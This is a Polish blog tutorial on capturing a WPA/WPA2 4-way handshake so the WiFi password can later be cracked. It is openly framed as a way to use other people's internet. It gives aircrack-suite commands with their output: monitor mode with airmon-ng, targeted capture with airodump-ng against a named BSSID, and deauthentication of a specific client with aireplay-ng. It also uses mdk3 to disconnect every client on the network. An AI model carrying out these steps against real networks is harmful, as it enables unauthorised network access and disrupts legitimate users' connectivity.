[WiFi] – Łapanie Hand-Shake WPA

WPA2/PSK TKIP jest już silniejszym zabezpieczeniem niż WEP i WPA, dostanie się do zabepieczonej sieci zajmie nam dużo więcej czasu niż w przypadku WEP.

Zobaczysz tutaj, jak łatwo odzyskać hasło z sieci bezprzewodowej chronionej przez WPA/WPA2.

Pierwsze co, aby móc zaatakować klucz musisz przechwycić coś co nazywa się 4-way handshake, czyli 4-stopniowe podawanie ręki. W nim zapisany jest klucz dostępu do sieci, zaszyfrowany oczywiście i to właśnie ten klucz musimy złamać by podkradać komuś Internety.

Przełącz kartę sieciową w tryb monitor, zrób to używając airmon-ng.

airmon-ng start wlan0
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1150 avahi-daemon
1152 NetworkManager
1154 avahi-daemon
1324 wpa_supplicant
 
Interface Chipset Driver
 
wlan0 Atheros ath9k - [phy0]
(monitor mode enabled on mon0)


Żeby przechwycić 4-way handshake musisz mieć dużo czasu jak i szczęścia, przekazywane jest ono tylko wtedy gdy nawiązywane jest połączenie klienta z AP od zera i gdy zostanie do końca poprawnie nawiązane.

airodump-ng musisz ustawić tak by przechwytywało tylko pakiety kierowane do określonego AP, dobrze też mierzyć tylko w kanał na którym nadaje serwer (filtrowanie pakietów to podstawa szybkich ataków).

U mnie atakujemy sieć NASA o BSSID: 00:04:ED:A3:80:11, działającej na kanale 1, dane zapisuję do pliku NASA i czekam na handshake.

airodump-ng mon0 --bssid 00:04:ED:A3:80:11 -c 1 -w NASA
 
[ CH  1 ][ Elapsed: 8 s ][ 2011-01-12 17:08 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
 
00:04:ED:A3:80:11 -56 93 77 0 0 1 54 WPA2 CCMP PSK N
 
BSSID STATION PWR Rate Lost Packets Probes
 
00:04:ED:A3:80:11 48:5D:60:34:A8:59 0 0 -54 0 2 NASA

Jak mogłeś zauważyć nie użyłem opcji –ivs, bo potrzebujemy pełnych pakietów, a nie części jak to jest przy atakowaniu WEPa.

Podczas przechwytywania pakietów okno wygląda podobnie do tego.

[CH  1 ][ Elapsed: 3 s ][ 2011-01-12 17:24 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
 
00:04:ED:A3:80:11 -53 40 40 12 9 1 54 WPA2 CCMP PSK NASA
 
BSSID STATION PWR Rate Lost Packets Probes
 
00:04:ED:A3:80:11 48:5D:60:34:A8:59 0 0 -54 0 5 NASA
00:04:ED:A3:80:11 00:4F:78:00:A2:A5 -40 24 - 1 28 25

Aby spowodować by klienci atakowanej sieci rozłączyli się z nią i ponownie połączyli:

aireplay-ng mon0 --deauth 0 -a 00:04:ED:A3:80:11 -c 48:5D:60:34:A8:59
12:37:23  Waiting for beacon frame (BSSID: 00:04:ED:A3:80:11) on channel 14
12:37:26  mon0 is on channel 14, but the AP uses channel 1
  • -a podajesz adres MAC atakowanego routera
  • -c adres MAC karty sieciowej, którą chcesz odciąć od sieci, aby mieć pewność, że ten komputer się za moment połączy ponownie podaj ten adres, przy którym jest największy ruch sieciowy

Po tym poleceniu odciąłem właśnie sam siebie z sieci.

Dane odczytasz z tabel w airodump-ng :inft:

Aby wyrzucić wszystkich z danej sieci można też użyć programu mdk3.

mdk3 mon0 d -t 00:04:ED:A3:80:11
Disconnecting between: 01:00:5E:00:00:16 and: 00:04:ED:A3:80:11
Disconnecting between: 33:33:00:00:00:0C and: 00:04:ED:A3:80:11
Disconnecting between: 01:00:5E:7F:FF:FA and: 00:04:ED:A3:80:11
....
Disconnecting between: 48:5D:60:34:A8:59 and: 00:04:ED:A3:80:11

d oznacza odłączenie wszystkich kart sieciowych z sieci, której MAC adres podany po parametrze -t

z/w ide mamie Internet zrobić.

A tak wygląda okno ekranu gdy handshake jest już przechwycony:

[ CH  1 ][ Elapsed: 12 s ][ 2011-01-12 17:24 ]<strong>[ WPA handshake: 00:04:ED:A3:80:11 ]</strong>
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
 
00:04:ED:A3:80:11 -53 40 130 27 9 1 54 WPA2 CCMP PSK NASA
 
BSSID STATION PWR Rate Lost Packets Probes
 
00:04:ED:A3:80:11 48:5D:60:34:A8:59 0 0 -54 0 25 NASA
00:04:ED:A3:80:11 00:4F:78:00:A2:A5 -40 24 - 1 28 25

No właśnie tak wygląda okno gdy handshake jest złapany przez skaner airodump-ng. Głównym problemem tego ataku jest złapanie handshake. Nie da się go złapać bez aktywnego użytkownika w sieci.

[Total: 0    Average: 0/5]